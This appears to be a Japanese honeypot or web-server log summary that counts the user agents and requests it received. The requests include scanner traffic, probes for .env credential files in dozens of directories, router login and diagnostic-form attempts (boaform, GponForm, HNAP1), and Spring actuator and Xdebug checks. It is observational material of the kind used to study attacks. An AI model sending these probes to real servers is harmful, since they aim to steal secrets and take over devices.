---|---|
22 | - |
2 | Hello, World |
2 | Mozila/5.0 |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
82 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0 |
6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/) |
4 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html) |
1 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 |
3 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
1 | MGLNDD_13.67.44.234_80 |
||
1 | \x03 |
||
17 | \x16\x03\x01 |
||
30 | GET | /.env |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /app/.env |
HTTP/1.1 |
1 | GET | /apps/.env |
HTTP/1.1 |
1 | GET | /base/.env |
HTTP/1.1 |
1 | GET | /blogs/.env |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
1 | GET | /cgi-bin/.env |
HTTP/1.1 |
1 | GET | /client/get_targets |
HTTP/1.1 |
1 | GET | /conf/.env |
HTTP/1.1 |
1 | GET | /database/.env |
HTTP/1.1 |
2 | GET | /download/.env |
HTTP/1.1 |
1 | GET | /evox/about |
HTTP/1.1 |
4 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /geoip/ |
HTTP/1.1 |
1 | GET | /geoserver/web/ |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /lib/.env |
HTTP/1.1 |
1 | GET | /library/.env |
HTTP/1.1 |
1 | GET | /main/.env |
HTTP/1.1 |
1 | GET | /new/.env |
HTTP/1.1 |
1 | GET | /newsite/.env |
HTTP/1.1 |
1 | GET | /nmaplowercheck1683313355 |
HTTP/1.1 |
1 | GET | /old/.env |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /protected/.env |
HTTP/1.1 |
1 | GET | /public/.env |
HTTP/1.1 |
1 | GET | /redmine/.env |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /shared/.env |
HTTP/1.1 |
1 | GET | /site/.env |
HTTP/1.1 |
2 | GET | /src/.env |
HTTP/1.1 |
1 | GET | /systembc/password.php |
HTTP/1.0 |
1 | GET | /upl.php |
HTTP/1.1 |
1 | GET | /vendor/.env |
HTTP/1.1 |
2 | GET | /vendor/laravel/.env |
HTTP/1.1 |
1 | GET | /vod/3383.html |
HTTP/1.1 |
2 | POST | /GponForm/diag_Form?images/ |
HTTP/1.1 |
2 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /admin |
HTTP/1.1 |
1 | POST | /app |
HTTP/1.1 |
1 | POST | /apps |
HTTP/1.1 |
1 | POST | /base |
HTTP/1.1 |
1 | POST | /blogs |
HTTP/1.1 |
6 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cgi-bin |
HTTP/1.1 |
1 | POST | /conf |
HTTP/1.1 |
1 | POST | /database |
HTTP/1.1 |
2 | POST | /download |
HTTP/1.1 |
1 | POST | /lib |
HTTP/1.1 |
1 | POST | /library |
HTTP/1.1 |
1 | POST | /main |
HTTP/1.1 |
1 | POST | /new |
HTTP/1.1 |
1 | POST | /newsite |
HTTP/1.1 |
1 | POST | /old |
HTTP/1.1 |
1 | POST | /protected |
HTTP/1.1 |
1 | POST | /public |
HTTP/1.1 |
1 | POST | /redmine |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | POST | /shared |
HTTP/1.1 |
1 | POST | /site |
HTTP/1.1 |
2 | POST | /src |
HTTP/1.1 |
2 | POST | /vendor/laravel |
HTTP/1.1 |
1 | POST | /vendor |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |